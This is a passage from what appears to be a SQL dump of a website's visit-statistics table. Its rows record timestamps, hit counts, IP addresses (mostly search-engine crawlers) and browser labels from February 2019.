150.159','other'),(390536,1550961150,1,1,0,0,'54.36.149.62','other'),(390537,1550961388,1,1,0,0,'157.55.39.100','other'),(390538,1550961561,1,1,0,0,'54.36.150.75','other'),(390539,1550961685,1,1,0,0,'66.249.64.31','chrome'),(390540,1550961953,1,1,0,0,'54.36.150.22','other'),(390541,1550962104,1,1,0,0,'46.229.168.148','other'),(390542,1550962197,1,1,0,0,'54.36.149.75','other'),(390543,1550962661,1,1,0,0,'54.36.150.109','other'),(390544,1550962850,1,1,0,0,'54.36.149.61','other'),(390545,1550963017,1,1,0,0,'157.55.39.100','other'),(390546,1550963107,1,1,0,0,'8.29.198.27','other'),(390547,1550963168,1,1,0,0,'66.249.64.31','chrome'),(390548,1550963300,2,2,0,0,'66.249.64.58','chrome'),(390549,1550963336,1,1,0,0,'54.36.148.38','other'),(390550,1550963677,1,1,0,0,'54.36.148.114','other'),(390551,1550963681,1,1,0,0,'66.249.64.30','chrome'),(390552,1550964193,1,1,0,0,'13.66.139.0','other'),(390553,1550964438,1,1,0,0,'8.29.198.26','other'),(390554,1550964536,1,1,0,0,'54.36.149.64','other'),(390555,1550964765,1,1,0,0,'54.36.148.231','other'),(390556,1550964941,1,1,0,0,'66.249.64.31','chrome'),(390557,1550964945,1,1,0,0,'66.249.64.30','chrome'),(390558,1550964949,1,1,0,0,'66.249.64.29','chrome'),(390559,1550965485,1,1,0,0,'216.244.66.241','other'),(390560,1550965947,1,1,0,0,'40.77.167.116','other'),(390561,1550966243,1,1,0,0,'54.36.150.125','other'),(390562,1550966929,1,1,0,0,'91.196.178.169','chrome'),(390563,1550967356,1,1,0,0,'54.36.150.46','other'),(390564,1550967378,1,1,0,0,'66.249.64.30','chrome'),(390565,1550967456,1,1,0,0,'46.229.168.133','other'),(390566,1550967604,1,1,0,0,'66.249.64.31','chrome'),(390567,1550967617,3,3,0,0,'66.249.64.29','chrome'),(390568,1550967974,1,1,0,0,'54.36.150.157','other'),(390569,1550968317,5,5,0,0,'178.154.244.11','other'),(390570,1550968556,1,1,0,0,'157.55.39.100','other'),(390571,1550968584,1,1,0,0,'66.249.64.29','chrome'),(390572,1550968610,1,1,0,0,'54.36.148.57','other'),(390573,1550968884,4,4,0,0,'5.45.207.79','other'),(390574,1550968903,1,1,0,0,'5.45.207.19','other'),(390575,1550969257,1,1,0,0,'54.36.150.104','other'),(390576,1550969339,1,1,0,0,'66.249.64.60','chrome'),(390577,1550969549,4,4,0,0,'178.154.244.11','other'),(390578,1550969658,1,1,0,0,'54.36.149.64','other'),(390579,1550969686,1,1,0,0,'66.249.64.30','chrome'),(390580,1550970050,2,2,0,0,'5.45.207.19','other'),(390581,1550970092,1,1,0,0,'141.8.142.103','other'),(390582,1550970167,1,1,0,0,'54.36.150.167','other'),(390583,1550970450,1,1,0,0,'66.249.64.29','chrome'),(390584,1550970515,2,2,0,0,'37.9.113.20','other'),(390585,1550970695,1,1,0,0,'178.154.171.24','other'),(390586,1550971078,1,1,0,0,'54.36.148.168','other'),(390587,1550971341,1,1,0,0,'66.249.64.58','chrome'),(390588,1550971394,2,2,0,0,'40.77.167.143','other'),(390589,1550971789,1,1,0,0,'66.249.64.62','chrome'),(390590,1550971939,1,1,0,0,'66.249.64.31','chrome'),(390591,1550972180,1,1,0,0,'5.45.207.19','other'),(390592,1550972182,1,1,0,0,'54.36.148.144','other'),(390593,1550972289,1,1,0,0,'54.36.149.89','other'),(390594,1550972618,1,1,0,0,'54.36.150.105','other'),(390595,1550972783,2,2,0,0,'216.244.66.241','other'),(390596,1550972950,1,1,0,0,'46.229.168.144','other'),(390597,1550973953,1,1,0,0,'8.29.198.26','other'),(390598,1550974109,1,1,0,0,'54.36.148.108','other'),(390599,1550974351,1,1,0,0,'66.249.64.31','chrome'),(390600,1550974661,1,1,0,0,'54.36.150.114','other'),(390601,1550975211,1,1,0,0,'40.77.167.49','other'),(390602,1550975271,1,1,0,0,'8.29.198.26','other'),(390603,1550975310,1,1,0,0,'54.36.148.126','other'),(390604,1550975478,1,1,0,0,'207.46.13.10','other'),(390605,1550975785,2,2,0,0,'34.210.72.212','chrome'),(390606,1550975787,1,1,0,0,'66.249.64.30','chrome'),(390607,1550975991,1,1,0,0,'54.36.150.83','other'),(390608,1550976060,1,1,0,0,'46.229.168.138','other'),(390609,1550976086,1,1,0,0,'66.249.64.62','chrome'),(390610,1550976110,1,1,0,0,'54.36.150.70','other'),(390611,1550976716,1,1,0,0,'66.249.64.31','chrome'),(390612,1550976758,1,1,0,0,'66.249.64.30','chrome'),(390613,1550977121,1,1,0,0,'46.229.168.129','other'),(390614,1550977671,1,1,0,0,'66.249.64.29','chrome'),(390615,1550977677,2,2,0,0,'157.55.39.175','other'),(390616,1550977831,1,1,0,0,'46.229.168.150','other'),(390617,1550977893,1,1,0,0,'66.249.64.60','chrome'),(390618,1550978270,1,1,0,0,'46.229.168.134','other'),(390619,1550978369,1,1,0,0,'46.229.168.142','other'),(390620,1550978746,1,1,0,0,'216.244.66.241','other'),(390621,1550978789,1,1,0,0,'66.249.64.31','chrome'),(390622,1550978969,1,1,0,0,'54.36.150.105','other'),(390623,1550979279,1,1,0,0,'54.36.148.208','other'),(390624,1550980075,1,1,0,0,'54.36.149.63','other'),(390625,1550980432,1,1,0,0,'54.36.149.83','other'),(390626,1550980441,1,1,0,0,'54.36.148.163','other'),(390627,1550980678,1,1,0,0,'207.46.13.129','other'),(390628,1550980961,2,2,0,0,'216.244.66.241','other'),(390629,1550980962,1,1,0,0,'66.249.64.31','chrome'),(390630,1550981385,1,1,0,0,'46.229.168.143','other'),(390631,1550981393,1,1,0,0,'66.249.64.29','chrome'),(390632,1550981608,1,1,0,0,'66.249.64.58','chrome'),(390633,1550981877,1,1,0,0,'40.77.167.49','other'),(390634,1550981972,1,1,0,0,'54.36.148.128','other'),(390635,1550982317,1,1,0,0,'46.229.168.147','other'),(390636,1550982490,1,1,0,0,'54.36.148.120','other'),(390637,1550982680,1,1,0,0,'66.249.64.30','chrome'),(390638,1550982850,1,1,0,0,'54.36.150.100','other'),(390639,1550982995,1,1,0,0,'157.55.39.175','other'),(390640,1550983383,1,1,0,0,'66.249.64.58','chrome'),(390641,1550983651,1,1,0,0,'66.249.64.30','chrome'),(390642,1550983693,3,3,0,0,'216.244.66.241','other'),(390643,1550983715,1,1,0,0,'46.229.168.146','other'),(390644,1550983866,1,1,0,0,'54.36.150.83','other'),(390645,1550984150,1,1,0,0,'54.36.148.144','other'),(390646,1550984610,2,2,0,0,'66.249.64.30','chrome'),(390647,1550984743,1,1,0,0,'66.249.64.62','chrome'),(390648,1550984791,1,1,0,0,'8.29.198.27','other'),(390649,1550984795,1,1,0,0,'66.249.64.60','chrome'),(390650,1550984880,3,3,0,0,'66.249.64.31','chrome'),(390651,1550984994,1,1,0,0,'54.36.149.77','other'),(390652,1550985020,1,1,0,0,'5.45.207.79','other'),(390653,1550985025,1,1,0,0,'141.8.142.103','other'),(390654,1550985270,1,1,0,0,'54.36.149.28','other'),(390655,1550985315,1,1,0,0,'46.229.168.148','other'),(390656,1550985540,1,1,0,0,'54.36.149.76','other'),(390657,1550985887,1,1,0,0,'54.36.150.125','other'),(390658,1550986099,1,1,0,0,'8.29.198.25','other'),(390659,1550986349,2,2,0,0,'91.196.178.130','chrome'),(390660,1550986554,1,1,0,0,'54.36.150.65','other'),(390661,1550986555,1,1,0,0,'157.55.39.181','other'),(390662,1550986747,1,1,0,0,'207.46.13.10','other'),(390663,1550986776,2,2,0,0,'66.249.64.29','chrome'),(390664,1550987018,1,1,0,0,'54.36.150.35','other'),(390665,1550987078,2,2,0,0,'66.249.64.30','chrome'),(390666,1550987397,2,2,0,0,'66.249.64.31','chrome'),(390667,1550987446,1,1,0,0,'54.36.150.8','other'),(390668,1550987457,1,1,0,0,'54.36.148.41','other'),(390669,1550987524,1,1,0,0,'91.196.178.46','chrome'),(390670,1550987614,1,1,0,0,'54.36.149.24','other'),(390671,1550987888,1,1,0,0,'54.36.148.113','other'),(390672,1550987910,1,1,0,0,'66.249.64.62','chrome'),(390673,1550988055,1,1,0,0,'46.229.168.143','other'),(390674,1550988231,1,1,0,0,'46.229.168.151','other'),(390675,1550988397,1,1,0,0,'66.249.64.30','chrome'),(390676,1550988414,1,1,0,0,'207.46.13.129','other'),(390677,1550988695,1,1,0,0,'66.249.64.31','chrome'),(390678,1550988791,1,1,0,0,'178.175.143.164','other'),(390679,1550989455,1,1,0,0,'216.244.66.241','other'),(390680,1550989686,1,1,0,0,'54.36.148.37','other'),(390681,1550989834,1,1,0,0,'66.249.64.30','chrome'),(390682,1550989907,1,1,0,0,'66.249.64.60','chrome'),(390683,1550990052,1,1,0,0,'54.36.150.107','other'),(390684,1550990127,1,1,0,0,'66.249.64.31','chrome'),(390685,1550990272,1,1,0,0,'54.36.148.154','other'),(390686,1550990437,1,1,0,0,'46.229.168.145','other'),(390687,1550990571,1,1,0,0,'46.229.168.151','other'),(390688,1550990682,1,1,0,0,'91.196.178.46','chrome'),(390689,1550990730,1,1,0,0,'37.115.191.132','chrome'),(390690,1550990776,1,1,0,0,'66.249.64.30','chrome'),(390691,1550991173,1,1,0,0,'66.249.64.62','chrome'),(390692,1550991237,1,1,0,0,'157.55.39.120','other'),(390693,1550991256,1,1,0,0,'54.36.150.189','other'),(390694,1550991269,1,1,0,0,'54.36.148.103','other'),(390695,1550991380,2,2,0,0,'46.229.168.132','other'),(390696,1550991511,1,1,0,0,'95.163.255.113','other'),(390697,1550991831,2,2,0,0,'66.249.64.31','chrome'),(390698,1550991966,1,1,0,0,'46.229.168.134','other'),(390699,1550992318,1,1,0,0,'54.36.149.78','other'),(390700,1550992321,1,1,0,0,'54.36.150.130','other'),(390701,1550992811,2,2,0,0,'66.249.64.30','chrome'),(390702,1550992815,1,1,0,0,'54.36.150.97','other'),(390703,1550992935,1,1,0,0,'54.36.148.9','other'),(390704,1550993278,1,1,0,0,'180.76.15.17','other'),(390705,1550993364,1,1,0,0,'54.36.148.146','other'),(390706,1550993502,1,1,0,0,'91.196.178.189','chrome'),(390707,1550993697,1,1,0,0,'54.36.148.61','other'),(390708,1550993764,1,1,0,0,'157.55.39.175','other'),(390709,1550993886,1,1,0,0,'66.249.64.30','chrome'),(390710,1550993936,1,1,0,0,'54.36.150.112','other'),(390711,1550994130,1,1,0,0,'66.249.64.29','chrome'),(390712,1550994311,1,1,0,0,'54.36.150.16','other'),(390713,1550994901,1,1,0,0,'54.36.150.174','other'),(390714,1550994973,1,1,0,0,'54.36.150.47','other'),(390715,1550995239,1,1,0,0,'157.55.39.175','other'),(390716,1550995320,1,1,0,0,'199.16.157.181','other'),(390717,1550995352,1,1,0,0,'54.36.150.26','other'),(390718,1550995354,1,1,0,0,'54.36.150.153','other'),(390719,1550995379,1,1,0,0,'54.36.150.20','other'),(390720,1550995531,1,1,0,0,'66.249.64.31','chrome'),(390721,1550995587,1,1,0,0,'23.103.64.39','other'),(390722,1550995619,1,1,0,0,'8.29.198.27','other'),(390723,1550995775,1,1,0,0,'66.249.64.60','chrome'),(390724,1550995861,1,1,0,0,'66.249.64.29','chrome'),(390725,1550996109,1,1,0,0,'54.36.149.72','other'),(390726,1550996788,1,1,0,0,'54.36.150.162','other'),(390727,1550996928,1,1,0,0,'54.36.150.52','other'),(390728,1550996929,1,1,0,0,'8.29.198.26','other'),(390729,1550996936,1,1,0,0,'54.36.148.25','other'),(390730,1550996963,1,1,0,0,'66.249.64.62','chrome'),(390731,1550996972,1,1,0,0,'54.36.148.192','other'),(390732,1550997277,1,1,0,0,'54.36.150.148','other'),(390733,1550998145,1,1,0,0,'207.46.13.75','other'),(390734,1550998285,1,1,0,0,'54.36.148.176','other'),(390735,1550998714,1,1,0,0,'66.249.64.31','chrome'),(390736,1550999211,1,1,0,0,'66.249.64.58','chrome'),(390737,1550999288,1,1,0,0,'66.249.64.30','chrome'),(390738,1550999411,1,1,0,0,'91.196.177.66','chrome'),(390739,1550999663,1,1,0,0,'54.36.148.105','other'),(390740,1550999713,1,1,0,0,'95.133.151.37','chrome'),(390741,1550999879,1,1,0,0,'54.36.148.88','other'),(390742,1551000785,1,1,0,0,'46.229.168.144','other'),(390743,1551000835,1,1,0,0,'66.249.64.58','chrome'),(390744,1551000869,1,1,0,0,'46.229.168.143','other'),(390745,1551000936,1,1,0,0,'91.196.178.131','chrome'),(390746,1551001035,1,1,0,0,'46.229.168.151','other'),(390747,1551001210,1,1,0,0,'87.250.224.81','other'),(390748,1551001263,1,1,0,0,'66.249.64.31','chrome'),(390749,1551001283,1,1,0,0,'54.36.149.64','other'),(390750,1551001289,1,1,0,0,'54.36.150.163','other'),(390751,1551001334,2,2,0,0,'5.45.207.79','other'),(390752,1551001364,5,5,0,0,'5.45.207.19','other'),(390753,1551001595,1,1,0,0,'37.9.113.148','other'),(390754,1551001606,1,1,0,0,'66.249.64.30','chrome'),(390755,1551001671,1,1,0,0,'54.36.149.52','other'),(390756,1551001696,1,1,0,0,'178.154.244.11','other'),(390757,1551001867,1,1,0,0,'141.8.142.103','other'),(390758,1551001884,1,1,0,0,'141.8.142.108','other'),(390759,1551001947,1,1,0,0,'54.36.150.143','other'),(390760,1551001968,1,1,0,0,'54.36.148.102','other'),(390761,1551002219,1,1,0,0,'54.36.150.91','other'),(390762,1551002245,1,1,0,0,'216.244.66.241','other'),(390763,1551002324,1,1,0,0,'5.45.207.19','other'),(390764,1551002331,2,2,0,0,'5.45.207.79','other'),(390765,1551002644,1,1,0,0,'54.36.149.56','other'),(390766,1551002662,1,1,0,0,'54.36.149.52','other'),(390767,1551002678,1,1,0,0,'87.250.224.65','other'),(390768,1551002789,1,1,0,0,'54.36.148.165','other'),(390769,1551002904,1,1,0,0,'66.249.64.58','chrome'),(390770,1551002994,2,2,0,0,'66.249.64.30','chrome'),(390771,1551003094,1,1,0,0,'54.36.148.78','other'),(390772,1551003137,2,2,0,0,'178.154.244.11','other'),(390774,1551003336,1,1,0,0,'5.45.207.79','other'),(390775,1551003345,2,2,0,0,'5.45.207.19','other'),(390776,1551003351,1,1,0,0,'54.36.149.50','other'),(390777,1551003388,1,1,0,0,'54.36.148.125','other'),(390778,1551003454,1,1,0,0,'54.36.149.73','other'),(390779,1551003636,1,1,0,0,'123.126.113.116','other'),(390780,1551003855,1,1,0,0,'54.36.150.123','other'),(390781,1551004015,1,1,0,0,'46.229.168.138','other'),(390782,1551004133,3,3,0,0,'66.249.64.29','chrome'),(390783,1551004230,1,1,0,0,'157.55.39.120','other'),(390784,1551004367,1,1,0,0,'54.36.149.50','other'),(390785,1551005183,1,1,0,0,'66.249.64.30','chrome'),(390786,1551005389,1,1,0,0,'157.55.39.120','other'),(390787,1551005499,1,1,0,0,'54.36.149.48','other'),(390788,1551005868,1,1,0,0,'54.36.148.6','other'),(390789,1551005917,1,1,0,0,'66.249.64.29','chrome'),(390790,1551006115,1,1,0,0,'54.36.148.126','other'),(390791,1551006142,1,1,0,0,'46.229.168.137','other'),(390792,1551006234,1,1,0,0,'46.229.168.139','other'),(390793,1551006451,1,1,0,0,'8.29.198.27','other'),(390794,1551006492,1,1,0,0,'46.229.168.146','other'),(390795,1551006851,1,1,0,0,'66.249.64.58','chrome'),(390796,1551006941,1,1,0,0,'66.249.64.29','chrome'),(390797,1551007012,1,1,0,0,'54.36.148.71','other'),(390798,1551007277,1,1,0,0,'54.36.148.195','other'),(390799,1551007509,1,1,0,0,'54.36.148.148','other'),(390800,1551007645,1,1,0,0,'66.249.64.31','chrome'),(390801,1551007767,1,1,0,0,'8.29.198.26','other'),(390802,1551007893,1,1,0,0,'54.36.149.35','other'),(390803,1551008003,1,1,0,0,'66.249.64.30','chrome'),(390804,1551008005,1,1,0,0,'54.36.148.146','other'),(390805,1551008174,1,1,0,0,'54.36.148.35','other'),(390806,1551008532,1,1,0,0,'54.36.148.90','other'),(390807,1551008659,1,1,0,0,'46.229.168.138','other'),(390808,1551008754,1,1,0,0,'180.76.15.160','other'),(390809,1551008765,1,1,0,0,'54.36.148.115','other'),(390810,1551008784,1,1,0,0,'54.36.150.52','other'),(390811,1551009022,1,1,0,0,'54.36.148.155','other'),(390812,1551009221,1,1,0,0,'207.46.13.216','other'),(390813,1551009518,1,1,0,0,'54.36.148.212','other'),(390814,1551009834,1,1,0,0,'157.55.39.120','other'),(390815,1551009858,1,1,0,0,'157.55.39.88','other'),(390816,1551009904,1,1,0,0,'54.36.149.32','other'),(390817,1551010013,1,1,0,0,'54.36.148.203','other'),(390818,1551010204,1,1,0,0,'54.36.148.16','other'),(390819,1551010313,1,1,0,0,'54.36.148.73','other'),(390820,1551010363,1,1,0,0,'40.77.167.51','other'),(390821,1551010600,1,1,0,0,'216.244.66.241','other'),(390822,1551010752,1,1,0,0,'180.76.15.134','other'),(390823,1551010790,1,1,0,0,'54.36.150.4','other'),(390824,1551010856,2,2,0,0,'157.55.39.120','other'),(390825,1551011105,1,1,0,0,'54.36.148.243','other'),(390826,1551011451,1,1,0,0,'54.36.148.69','other'),(390827,1551011710,1,1,0,0,'66.249.64.31','chrome'),(390828,1551011806,1,1,0,0,'95.132.50.43','chrome'),(390829,1551011933,1,1,0,0,'54.36.148.34','other'),(390830,1551011978,1,1,0,0,'40.77.167.49','other'),(390831,1551012256,1,1,0,0,'157.55.39.88','other'),(390832,1551012485,1,1,0,0,'5.45.207.79','other'),(390833,1551012594,1,1,0,0,'66.249.64.30','chrome'),(390834,1551012637,1,1,0,0,'54.36.148.13','other'),(390835,1551012921,1,1,0,0,'66.249.64.60','chrome'),(390836,1551013739,2,2,0,0,'66.249.64.29','chrome'),(390837,1551014287,1,1,0,0,'54.36.150.155','other'),(390838,1551014403,1,1,0,0,'207.46.13.26','other'),(390839,1551014552,1,1,0,0,'54.36.150.150','other'),(390840,1551014627,1,1,0,0,'54.36.150.68','other'),(390841,1551014737,1,1,0,0,'54.36.150.28','other'),(390842,1551014828,1,1,0,0,'54.36.148.78','other'),(390843,1551014837,1,1,0,0,'54.36.150.159','other'),(390844,1551015379,1,1,0,0,'46.229.168.141','other'),(390845,1551015459,1,1,0,0,'54.36.149.2','other'),(390846,1551015965,1,1,0,0,'54.36.148.46','other'),(390847,1551016014,1,1,0,0,'207.46.13.26','other'),(390848,1551016221,1,1,0,0,'54.36.149.21','other'),(390849,1551016629,1,1,0,0,'207.46.13.77','other'),(390850,1551016893,3,3,0,0,'66.249.64.29','chrome'),(390851,1551017149,1,1,0,0,'66.102.9.62','chrome'),(390852,1551017246,1,1,0,0,'66.249.64.31','chrome'),(390853,1551017284,1,1,0,0,'8.29.198.26','other'),(390854,1551017346,1,1,0,0,'66.249.64.30','chrome'),(390855,1551017546,1,1,0,0,'54.36.150.75','other'),(390856,1551017737,1,1,0,0,'54.36.150.28','other'),(390857,1551017954,1,1,0,0,'216.244.66.241','other'),(390858,1551018173,1,1,0,0,'66.249.64.31','chrome'),(390859,1551018595,1,1,0,0,'8.29.198.25','other'),(390860,1551018791,1,1,0,0,'54.36.148.40','other'),(390861,1551019191,1,1,0,0,'66.249.64.29','chrome'),(390862,1551019315,1,1,0,0,'66.249.64.31','chrome'),(390863,1551019383,1,1,0,0,'54.36.150.63','other'),(390864,1551019826,1,1,0,0,'141.8.142.144','other'),(390865,1551019983,1,1,0,0,'180.76.15.147','other'),(390866,1551020318,1,1,0,0,'54.36.149.6','other'),(390867,1551020491,1,1,0,0,'5.255.253.16','other'),(390868,1551020566,1,1,0,0,'54.36.150.132','other'),(390869,1551020591,2,2,0,0,'66.249.64.60','chrome'),(390870,1551020628,1,1,0,0,'87.250.224.118','other'),(390871,1551020666,1,1,0,0,'54.36.148.155','other'),(390872,1551020948,1,1,0,0,'54.36.150.111','other'),(390873,1551020999,3,3,0,0,'66.249.64.29','chrome'),(390874,1551021083,1,1,0,0,'66.249.64.58','chrome'),(390875,1551021142,1,1,0,0,'207.46.13.26','other'),(390876,1551021430,1,1,0,0,'54.36.149.77','other'),(390877,1551021473,1,1,0,0,'37.9.113.20','other'),(390878,1551021497,1,1,0,0,'5.255.253.38','other'),(390879,1551021528,1,1,0,0,'141.8.142.103','other'),(390880,1551021530,1,1,0,0,'95.108.181.54','other'),(390881,1551021652,1,1,0,0,'54.36.148.41','other'),(390882,1551021738,1,1,0,0,'5.45.207.79','other'),(390883,1551021820,1,1,0,0,'54.36.148.30','other'),(390884,1551022168,1,1,0,0,'66.249.64.62','chrome'),(390885,1551022442,2,2,0,0,'66.249.64.29','chrome'),(390886,1551023011,1,1,0,0,'66.249.64.60','chrome'),(390887,1551023357,1,1,0,0,'37.9.113.38','other'),(390888,1551023533,1,1,0,0,'54.36.148.213','other'),(390889,1551023586,1,1,0,0,'54.36.148.90','other'),(390890,1551023772,1,1,0,0,'207.46.13.26','other'),(390891,1551024210,1,1,0,0,'207.46.13.77','other'),(390892,1551024432,1,1,0,0,'46.229.168.136','other'),(390893,1551024814,1,1,0,0,'46.229.168.141','other'),(390894,1551024885,1,1,0,0,'66.249.64.60','chrome'),(390895,1551025363,1,1,0,0,'207.46.13.26','other'),(390896,1551025636,1,1,0,0,'40.77.167.84','other'),(390897,1551025727,1,1,0,0,'54.36.149.57','other'),(390898,1551025873,2,2,0,0,'216.244.66.241','other'),(390899,1551026552,1,1,0,0,'66.249.64.30','chrome'),(390900,1551027057,1,1,0,0,'207.46.13.26','other'),(390901,1551027389,1,1,0,0,'54.36.148.96','other'),(390902,1551027591,1,1,0,0,'207.46.13.123','other'),(390903,1551027669,2,2,0,0,'66.249.64.30','chrome'),(390904,1551028120,1,1,0,0,'8.29.198.27','other'),(390905,1551028158,1,1,0,0,'54.36.150.169','other'),(390906,1551028329,1,1,0,0,'66.249.64.31','chrome'),(390907,1551028388,1,1,0,0,'46.211.50.209','chrome'),(390908,1551029038,1,1,0,0,'54.36.150.133','other'),(390909,1551029301,1,1,0,0,'207.46.13.77','other'),(390910,1551029391,1,1,0,0,'66.249.64.31','chrome'),(390911,1551029423,1,1,0,0,'8.29.198.26','other'),(390912,1551029544,1,1,0,0,'54.36.148.218','other'),(390913,1551029605,1,1,0,0,'66.249.64.62','chrome'),(390914,1551029684,1,1,0,0,'54.36.149.82','other'),(390915,1551029737,1,1,0,0,'54.36.149.38','other'),(390916,1551030300,1,1,0,0,'54.36.148.58','other'),(390917,1551030443,1,1,0,0,'66.249.64.58','chrome'),(390918,1551030548,1,1,0,0,'178.54.79.194','chrome'),(390919,1551030741,1,1,0,0,'66.249.64.30','chrome'),(390920,1551030800,1,1,0,0,'54.36.148.1','other'),(390921,1551030912,1,1,0,0,'54.36.150.39','other'),(390922,1551031154,1,1,0,0,'207.46.13.26','other'),(390923,1551031293,1,1,0,0,'207.46.13.77','other'),(390924,1551031426,1,1,0,0,'178.162.204.14','chrome'),(390925,1551031547,1,1,0,0,'157.55.39.245','other'),(390926,1551031603,1,1,0,0,'54.36.150.90','other'),(390927,1551032060,1,1,0,0,'54.36.148.173','other'),(390928,1551032126,2,2,0,0,'66.249.64.29','chrome'),(390929,1551032145,1,1,0,0,'91.196.178.187','chrome'),(390930,1551032897,1,1,0,0,'54.36.148.20','other'),(390931,1551033022,1,1,0,0,'54.36.148.109','other'),(390932,1551033118,1,1,0,0,'157.55.39.245','other'),(390933,1551033122,2,2,0,0,'40.77.167.218','other'),(390934,1551033237,1,1,0,0,'91.196.178.187','chrome'),(390935,1551033266,1,1,0,0,'54.36.149.12','other'),(390936,1551033489,1,1,0,0,'54.36.148.45','other'),(390937,1551033647,1,1,0,0,'54.36.148.195','other'),(390938,1551033701,1,1,0,0,'54.36.150.162','other'),(390939,1551033704,1,1,0,0,'95.132.35.124','other'),(390940,1551033873,1,1,0,0,'54.36.148.213','other'),(390941,1551034196,3,3,0,0,'216.244.66.241','other'),(390942,1551034319,1,1,0,0,'54.36.150.177','other'),(390943,1551034369,1,1,0,0,'54.36.149.5','other'),(390944,1551034408,1,1,0,0,'54.36.149.37','other'),(390945,1551034600,1,1,0,0,'54.36.148.167','other'),(390946,1551035076,1,1,0,0,'46.229.168.136','other'),(390947,1551035196,1,1,0,0,'157.55.39.245','other'),(390948,1551035459,1,1,0,0,'66.249.64.62','chrome'),(390949,1551035600,1,1,0,0,'54.36.149.25','other'),(390950,1551035609,1,1,0,0,'66.249.64.29','chrome'),(390951,1551035730,1,1,0,0,'46.229.168.137','other'),(390952,1551036375,1,1,0,0,'46.229.168.153','other'),(390953,1551036427,1,1,0,0,'207.46.13.204','other'),(390954,1551036809,3,3,0,0,'216.244.66.241','other'),(390955,1551036907,1,1,0,0,'141.8.142.38','other'),(390956,1551036940,1,1,0,0,'54.36.149.88','other'),(390957,1551036982,2,2,0,0,'66.249.64.29','chrome'),(390958,1551037026,1,1,0,0,'87.250.224.65','other'),(390959,1551037214,1,1,0,0,'54.36.148.1','other'),(390960,1551037301,3,3,0,0,'178.154.244.11','other'),(390961,1551037379,1,1,0,0,'5.45.207.19','other'),(390962,1551037538,3,3,0,0,'5.45.207.79','other'),(390963,1551037578,1,1,0,0,'40.77.167.132','other'),(390964,1551037620,2,2,0,0,'141.8.142.103','other'),(390965,1551037870,1,0,1,0,'66.249.64.30',''),(390966,1551037982,1,1,0,0,'37.9.113.148','other'),(390967,1551038057,1,1,0,0,'37.9.113.103','other'),(390968,1551038104,1,1,0,0,'54.36.150.149','other'),(390969,1551038406,1,1,0,0,'46.229.168.140','other'),(390970,1551038584,1,1,0,0,'109.201.154.250','other'),(390971,1551038721,2,2,0,0,'66.249.64.30','chrome'),(390972,1551038928,1,1,0,0,'5.45.207.79','other'),(390973,1551038962,1,1,0,0,'8.29.198.26','other'),(390974,1551038967,2,2,0,0,'66.249.64.58','chrome'),(390975,1551039008,3,3,0,0,'178.154.244.11','other'),(390976,1551039102,1,1,0,0,'66.249.64.29','chrome'),(390977,1551039185,3,3,0,0,'5.45.207.19','other'),(390978,1551039274,1,1,0,0,'66.249.64.62','chrome'),(390979,1551039306,1,1,0,0,'46.229.168.137','other'),(390980,1551039417,1,1,0,0,'54.36.148.255','other'),(390981,1551039543,1,1,0,0,'157.55.39.245','other'),(390982,1551039558,3,3,0,0,'216.244.66.241','other'),(390983,1551039656,1,1,0,0,'141.8.183.23','other'),(390984,1551039837,2,2,0,0,'5.45.207.79','other'),(390985,1551039872,1,1,0,0,'54.36.149.105','other'),(390986,1551039911,1,1,0,0,'95.108.213.4','other'),(390987,1551040046,1,1,0,0,'40.77.167.218','other'),(390988,1551040258,1,1,0,0,'8.29.198.27','other'),(390989,1551040260,1,1,0,0,'54.36.148.137','other'),(390990,1551040426,1,1,0,0,'54.36.148.72','other'),(390991,1551040434,1,1,0,0,'178.154.244.11','other'),(390992,1551040441,1,1,0,0,'46.229.168.137','other'),(390993,1551040772,1,1,0,0,'54.36.148.177','other'),(390994,1551041275,1,1,0,0,'54.36.150.185','other'),(390995,1551041693,1,1,0,0,'54.36.150.135','other'),(390996,1551041902,1,1,0,0,'54.36.148.128','other'),(390997,1551041910,1,1,0,0,'54.36.149.22','other'),(390998,1551042030,1,1,0,0,'54.36.150.25','other'),(390999,1551042202,1,1,0,0,'54.36.150.86','other'),(391000,1551042319,1,1,0,0,'66.249.64.31','chrome'),(391001,1551042480,1,1,0,0,'46.229.168.130','other'),(391002,1551042596,1,1,0,0,'216.244.66.241','other'),(391003,1551042628,1,1,0,0,'54.36.148.129','other'),(391004,1551042713,2,2,0,0,'66.249.64.30','chrome'),(391005,1551043167,1,1,0,0,'54.36.148.1','other'),(391006,1551043283,1,1,0,0,'40.77.167.11','other'),(391007,1551043352,1,1,0,0,'54.36.150.145','other'),(391008,1551043398,1,1,0,0,'54.36.150.133','other'),(391009,1551043552,1,1,0,0,'54.36.148.164','other'),(391010,1551043605,1,1,0,0,'46.229.168.149','other'),(391011,1551044168,1,1,0,0,'66.249.64.31','chrome'),(391012,1551044183,1,1,0,0,'66.249.64.30','chrome'),(391013,1551044285,1,1,0,0,'54.36.148.167','other'),(391014,1551044491,1,1,0,0,'66.249.64.58','chrome'),(391015,1551044923,1,1,0,0,'54.36.148.42','other'),(391016,1551045552,1,1,0,0,'46.119.112.31','chrome'),(391017,1551045634,1,1,0,0,'54.36.148.75','other'),(391018,1551045822,1,1,0,0,'54.36.150.87','other'),(391019,1551046250,1,1,0,0,'54.36.150.168','other'),(391020,1551046549,1,1,0,0,'66.249.64.29','chrome'),(391021,1551046869,1,1,0,0,'207.46.13.28','other'),(391022,1551047037,1,1,0,0,'40.77.167.145','other'),(391023,1551047612,1,1,0,0,'66.249.64.31','chrome'),(391024,1551047625,1,1,0,0,'54.36.148.169','other'),(391025,1551048313,2,2,0,0,'216.244.66.241','other'),(391026,1551048848,1,1,0,0,'141.8.142.103','other'),(391027,1551049167,1,1,0,0,'87.250.224.65','other'),(391028,1551049247,1,1,0,0,'180.76.15.135','other'),(391029,1551049359,1,1,0,0,'54.36.150.36','other'),(391030,1551049482,1,1,0,0,'54.36.148.88','other'),(391031,1551049512,1,1,0,0,'54.36.150.67','other'),(391032,1551049675,1,1,0,0,'66.249.64.31','chrome'),(391033,1551049812,1,1,0,0,'8.29.198.27','other'),(391034,1551049970,1,1,0,0,'141.8.183.23','other'),(391035,1551050267,1,1,0,0,'13.57.233.99','chrome'),(391036,1551050274,1,1,0,0,'91.209.11.236','other'),(391037,1551050413,1,1,0,0,'66.249.64.29','chrome'),(391038,1551050436,1,1,0,0,'54.36.148.0','other'),(391039,1551050601,1,1,0,0,'46.229.168.137','other'),(391040,1551050654,1,1,0,0,'46.229.168.130','other'),(391041,1551050686,2,2,0,0,'207.46.13.28','other'),(391042,1551050687,2,2,0,0,'216.244.66.241','other'),(391043,1551050727,1,1,0,0,'54.36.148.92','other'),(391044,1551050845,1,1,0,0,'54.36.150.139','other'),(391045,